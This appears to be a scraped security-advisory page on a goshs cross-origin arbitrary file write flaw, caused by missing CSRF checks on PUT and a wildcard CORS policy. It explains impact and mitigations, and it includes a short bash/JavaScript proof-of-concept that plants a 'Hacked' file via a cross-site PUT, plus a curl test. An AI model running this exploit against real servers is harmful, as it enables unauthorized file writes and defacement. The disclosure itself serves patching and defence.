goshs, Cross-Origin Arbitrary File Write via CSRF, GHSA-rhf7-wvw3-vjvm (Medium)

Listen to this Post

How the CVE Works

The vulnerability is a cross-origin arbitrary file write, enabled by two flawed mechanisms.
Root Cause 1 – Missing CSRF Protection on PUT Requests
– The `PUT` upload handler in `httpserver/updown.go` lacks the `checkCSRF()` call that was added to the `POST` handler in the earlier GHSA‑jrq5‑hg6x‑j6g3 patch.
– As a result, `PUT` requests are accepted without any CSRF token, allowing an attacker to upload arbitrary files without the victim’s consent.

Root Cause 2 – Wildcard CORS Configuration

  • The `OPTIONS` preflight handler in `httpserver/server.go` unconditionally returns:
    – `Access-Control-Allow-Origin: `
    – `Access-Control-Allow-Methods: POST, PUT, OPTIONS`
    – This permissive CORS policy allows any website’s JavaScript to pass the browser’s CORS preflight check and send `PUT` requests to the target `goshs` instance.

Combined Impact

  • A malicious website can force a victim’s browser to send authenticated `PUT` requests to a `goshs` server (even if it is only reachable on localhost or an internal network), bypassing network isolation.
  • This enables the attacker to write arbitrary files into the server’s webroot, overwrite existing files, and potentially escalate to remote code execution if the uploaded file is later executed.

DailyCVE Form

Platform: goshs
Version: < 2.0.2
Vulnerability: Missing CSRF
Severity: Medium
Date: 2026-04-23

Prediction: Patch by 2026-05-07

Analytics under What Undercode Say

Exploit script (requires victim to visit malicious site)
!/bin/bash
TARGET="http://localhost:8080"
FILE_CONTENT="

<h1>Hacked</h1>

"
Craft malicious HTML that sends PUT request
cat <<EOF > exploit.html
<html>

<script>
fetch('$TARGET/evil.html', {
method: 'PUT',
headers: {'Content-Type': 'text/html'},
body: '$FILE_CONTENT'
});
</script>

</html>
EOF
echo "Deliver exploit.html to victim. When visited, file will be written to $TARGET/evil.html"
Check if server is vulnerable without CSRF token
curl -X PUT $TARGET/test.txt -d "vulnerable"

Exploit

  1. Attacker hosts a webpage containing JavaScript that sends a `PUT` request to the target `goshs` server.
  2. Victim, who is authenticated to the `goshs` server (e.g., via Basic Auth), visits the attacker’s page.
  3. Browser automatically includes the victim’s credentials and executes the `PUT` request because:

– The server does not require a CSRF token for PUT.
– The wildcard `Access-Control-Allow-Origin: ` permits the cross-origin request.
4. The `PUT` request writes an attacker‑controlled file to the server’s webroot, potentially overwriting existing files.

Protection from this CVE

  • Upgrade goshs to version 2.0.2 or later.
  • Bind the server exclusively to the loopback interface (127.0.0.1) if it is only needed locally.
  • Restrict CORS headers to a whitelist of trusted origins instead of using “.
  • Monitor webroot for unexpected files and consider deploying a web application firewall (WAF) to block rogue `PUT` requests.

Impact

  • Arbitrary File Write – Any website can force the victim’s browser to write arbitrary files to the server.
  • File Overwrite – Existing files can be silently replaced, potentially leading to defacement or code execution.
  • Bypass Network Isolation – The attack works even if the server is only reachable on localhost or an internal network, breaking typical security boundaries.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top